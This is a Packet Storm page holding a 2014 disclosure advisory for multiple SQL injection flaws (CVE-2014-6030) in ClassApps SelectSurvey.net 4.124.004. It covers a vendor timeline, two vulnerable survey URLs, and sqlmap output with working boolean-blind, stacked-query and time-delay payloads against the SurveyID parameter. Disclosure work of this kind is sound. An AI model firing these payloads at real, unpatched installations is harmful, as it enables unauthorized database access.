what you don't know can hurt you

ClassApps SelectSurvey.net 4.124.004 SQL Injection

ClassApps SelectSurvey.net 4.124.004 SQL Injection
Posted Sep 17, 2014
Authored by BillV

ClassApps SelectSurvey.net version 4.124.004 suffers from multiple remote SQL injection vulnerabilities.

tags | exploit, remote, vulnerability, sql injection
advisories | CVE-2014-6030
MD5 | d7023e0da35113b2992633670ea94c69

ClassApps SelectSurvey.net 4.124.004 SQL Injection

Change Mirror Download
Details
==========
Software: ClassApps SelectSurvey.net
Description: Multiple SQL Injection Vulnerabilities
Version: 4.124.004
Homepage: https://www.classapps.com/SelectSurveyNETOverview.asp
Vendor Fix: 4.125.002
CVE: 2014-6030

Timeline
==========
Aug 28 2014 - Vendor Notified
Aug 28 2014 - CVE Requested
Aug 28 2014 - Vendor Response
Sep 01 2014 - CVE Assigned
Sep 01 2014 - Upgraded Version Released
Sep 17 2014 - Disclosure

Description
==========
SelectSurvey.net is a web-based survey application written in ASP.net
and C#. It is vulnerable to multiple SQL injection attacks, both
authenticated and unauthenticated. The authenticated vulnerability
resides within the file upload script, as the parameters are not
sanitized prior to being placed into the SQL query. ClassApps had
previously listed 'SQL injection protection' as a feature and did have
several functions in place to attempt to prevent such attacks but due to
using a "blacklisting" approach, it is possible to circumvent these
functions. These functions are used elsewhere throughout the application
to protect GET request variables but are not sufficient. Only this
specific version of the application has been tested but it is highly
likely these vulnerabilities exist within prior versions. It has not
been confirmed that these vulnerabilities are fixed. The vendor stated
that they would be fixed in this new release however, they do not allow
download of the code unless you are a customer so fixes have not been
verified.

Examples
==========
/survey/ReviewReadOnlySurvey.aspx?ResponseID=<num>&SurveyID=[SQLi]
(unauthenticated)
/survey/UploadImagePopupToDb.aspx?ResponseID=<num>&SurveyID=[SQLi]
(authenticated)

sqlmap identified the following injection points:
---
Place: GET
Parameter: SurveyID
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: ResponseID=1&SurveyID=1' AND 4002=4002 AND 'dLur'='dLur

Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: ResponseID=1&SurveyID=1'; WAITFOR DELAY '0:0:5'--

Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: ResponseID=1&SurveyID=1' WAITFOR DELAY '0:0:5'--
---
[14:01:39] [INFO] testing Microsoft SQL Server
[14:01:39] [INFO] confirming Microsoft SQL Server
[14:01:39] [INFO] the back-end DBMS is Microsoft SQL Server
[14:01:39] [INFO] fetching banner
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5
back-end DBMS operating system: Windows 7 Service Pack 1
back-end DBMS: Microsoft SQL Server 2008
banner:
---
Microsoft SQL Server 2008 R2 (SP2) - 10.50.4000.0 (X64)
Jun 28 2012 08:36:30
Copyright (c) Microsoft Corporation
Enterprise Edition (64-bit) on Windows NT 6.1 <X64> (Build 7601:
Service Pack 1)
---





Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

May 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    16 Files
  • 2
    May 2nd
    8 Files
  • 3
    May 3rd
    8 Files
  • 4
    May 4th
    2 Files
  • 5
    May 5th
    1 Files
  • 6
    May 6th
    15 Files
  • 7
    May 7th
    22 Files
  • 8
    May 8th
    16 Files
  • 9
    May 9th
    17 Files
  • 10
    May 10th
    16 Files
  • 11
    May 11th
    3 Files
  • 12
    May 12th
    4 Files
  • 13
    May 13th
    25 Files
  • 14
    May 14th
    24 Files
  • 15
    May 15th
    78 Files
  • 16
    May 16th
    16 Files
  • 17
    May 17th
    0 Files
  • 18
    May 18th
    0 Files
  • 19
    May 19th
    0 Files
  • 20
    May 20th
    0 Files
  • 21
    May 21st
    0 Files
  • 22
    May 22nd
    0 Files
  • 23
    May 23rd
    0 Files
  • 24
    May 24th
    0 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close